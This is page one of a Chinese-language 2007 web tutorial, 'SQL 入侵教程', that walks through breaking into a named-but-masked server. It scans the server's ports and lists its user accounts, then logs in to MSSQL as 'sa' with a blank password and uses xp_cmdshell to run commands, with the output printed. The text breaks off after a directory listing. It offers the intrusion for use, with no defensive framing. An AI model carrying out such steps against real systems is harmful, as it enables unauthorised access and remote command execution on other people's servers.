文章分类 | 推荐文章 | 最新文章 | 热点文章 | 最新软件 | 精品软件 | 下载排行 | 推荐下载 | 免费看大片 | WPS | 杀毒软件
清风网络
首 页 软件下载 网络学院 数码学院
QQ 电脑入门 游戏 操作系统 图形处理 办公软件 媒体动画 精文荟萃 工具软件 网络编程 程序开发 网络技术 认证考试 网站建设 文章专栏
当前位置:清风网络学院网络技术黑客技术SQL 入侵教程
精品推荐
特别推荐
·简单方法查找黑客老巢
·一次入侵过程的公开分析
·快速利用135端口入侵个人电脑
·基础知识 初级黑客安全技术命令详解
·IPC$入侵的高级手段与方法
·在QQ上与任意陌生人聊天的新绝招
·“黑客”教你如何远程控制计算机
·多种DDoS攻击技术方法
·黑客入侵前的信息收集
·看黑客如何发动对电子邮件系统的攻击
·经典:各个网络端口的入侵方法
·防范黑客 从两大方面阻止域名被劫持
·黑客、红客、蓝客、飞客究竟是什么?
·认清虚虚实实的“ARP攻击”防御方法
·黑客知识 彻底堵死SQL注入工具漏洞
·赛迪网"IT技术百家讲坛"开讲 如何防御黑客?
·黑客如何利用DNS欺骗在局域网中挂马
·Windows黑客编程基础
·黑客很狡猾 如何减轻DDoS攻击危害?
·网络攻击的几种攻击与防御手法大揭秘
热点TOP10
·简单方法查找黑客老巢
·最详细的黑客入门法则
·“黑客”教你如何远程控制计算机
·我是怎么进入他人计算机的
·一次入侵过程的公开分析
·RM转换精灵V 7.1主程序脱壳
·快速利用135端口入侵个人电脑
·Windows黑客编程基础
·收费网站破解攻略
·黑客入侵指定网站的一些方法介绍
·堵死黑客攻击的十一点原则
·网络攻击技术与攻击工具六大趋势
·黑客发布针对微软软件漏洞的攻击新代码
·设置路由器ACL有效防范黑客与病毒
·黑客的社会工程攻击新技术:机遇型攻击
·回顾中国黑客的发展里程
·不用杀毒软件也能让系统百毒不侵
·黑客遥控器可致计算机被远程控制
·黑客域名劫持攻击详细步骤
·后门程序知识完全解析

SQL 入侵教程

日期:2007年3月13日 作者:清风网络学院 查看:[大字体 中字体 小字体]


先ping出目标主机的IP地址: 
连接IP主机: 211.154.xxx.xx... 
发送 56 个字节... 
接收到 56 个字节! 历时: 0毫秒 
结论: IP主机正在与Internet连接中... 

  接着选择打开扫描器x-way,选择高级扫描功能。输入目标IP,开始扫描。数分钟后得到扫描结果如下(结果经整理): 

主机信息 
主机名:BEWDB01NOK 
80(HTTP) 
21(FTP Control) 
25(SMTP) 
443(HTTPS) 
1433(MSSQL) 
5631(PCAnyWhere) 
用户列表 
Administrator (Admin) Guest hacker (Admin) IUSR_BEWDB01NOK IWAM_BEWDB01NOK ogilvy remoteuser (Admin) 
漏洞: 
/\../readme.txt (HTTP: 200 ) 
/msadc/msadcs.dll (HTTP: 200 ) 
/iisadmpwd/achg.htr (HTTP: 200 ) 
/_AuthChangeUrl (HTTP: 200 ) 
/?PageServices (HTTP: 200 ) 

  上一步中得到目标服务器的相关有用信息。可以发现扫描结果中并无可用的asp/cgi漏洞。而从所开端口来看, 

21(FTP Control) 
1433(MSSQL) 
5631(PCAnyWhere) 
只有这三个可用。在万一得已的情况下,我是不会用暴力破ftp的。那么只好从 
1433,5631这两个端口入手了!我们知道,1433是ms-sql的服务端口,默认情况下它的最高权限用户帐号SA口令为空。如果管理员疏忽了这一点,没有给SA一个口令的话,事情就好办了!先来试试看。从www.tianxing.org下一个ms-sql的客户端,在Host框中输入目标ip:211.154.xxx.xx 
Username为sa 
password框空,连接: 

SQL>Connecting 211.154.xxx.xx 
SQL>Connected to 211.154.xxx.xx 

  呵呵!看来对方管理员没有对sa设置一个口令!太好了!可以在客户端以xp_cmdshell " "的形式运行任意dos指令了!dir一下试试看: 
SQL>Command: xp_cmdshell "dir c:\" 
驱动器 C 中的卷没有卷标。 
卷的序列号是 5CBD-664C 
卷的序列号是 5CBD-664C 
c:\ 的目录 
c:\ 的目录 
01-12-20 08:13p <DIR> 2u2u 
01-07-23 08:10p 0 AUTOEXEC.BAT 
01-11-28 04:02p 84 biaoti.txt 
01-07-23 08:10p 0 CONFIG.SYS 
01-11-22 11:49a <DIR> InetPub 
01-10-25 11:12a 15,360 kkkk.XLS 
01-07-24 12:09p <DIR> MSSQL7 
01-12-12 11:00a 134,217,728 pagefile.sys 
01-11-30 10:59a <DIR> Program Files 
01-09-04 02:43p 136 sp_attach.sql 
01-12-20 04:12p <DIR> temp 
01-09-27 11:14a <DIR> unzipped 
01-12-15 12:09a <DIR> WINNT 
13 个文件 134,233,308 字节 

[1] [2] [3] 下一页 




上一篇:配置RD9中的DNS

下一篇:Win Server 2003无盘终端网组建

SQL 入侵教程 相关文章:
·用Photoshop画漫画教程之基础入门
·外挂 录象 网站 举报方案最新教程_QQ堂
·Photoshop绘制苹果风格背景效果简明教程
·Telnet入侵最完全手册
·IRIS Traffic Analyzer简易教程
·一次入侵过程的公开分析
·快速利用135端口入侵个人电脑
·photoshop制作水晶球效果的教程
·Excel动画教程:添加多个视图
·Excel动画教程:字符替换
SQL 入侵教程 相关软件:
·刘天礼 吉他视频教程
·黑客视频教程 VMware虚拟机的安装和使用
·PS空气-原野桔子香水教程合集
·UML面向对象建模技术 csf 视频教程
·黑娃破解教程(破解成人收费网站)
·电脑上网实用操作教程
·Fireworks MX职业技能培训教程
·SQL/MYSQL/数据库教程专栏
·孙鑫VC++从入门到精通开发详解视频教程FLASH版
·Photoshop 7.0 实用教程

特别声明:本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载,但请务必注明出处和原始作者。文章版权归文章原始作者所有。对于被本站转载文章的个人和网站,我们表示深深的谢意。如果本站转载的文章有版权问题请联系编辑人员,我们尽快予以更正。
[打印本页] [关闭窗口] 转载请注明来源:http://www.viphot.com
| 帮助(?) | 版权声明 | 友情连接 | 关于我们 | 信息发布
Copyright 2007 www.viphot.com All Rights Reserved. 鄂ICP备05000083号Powered by:viphot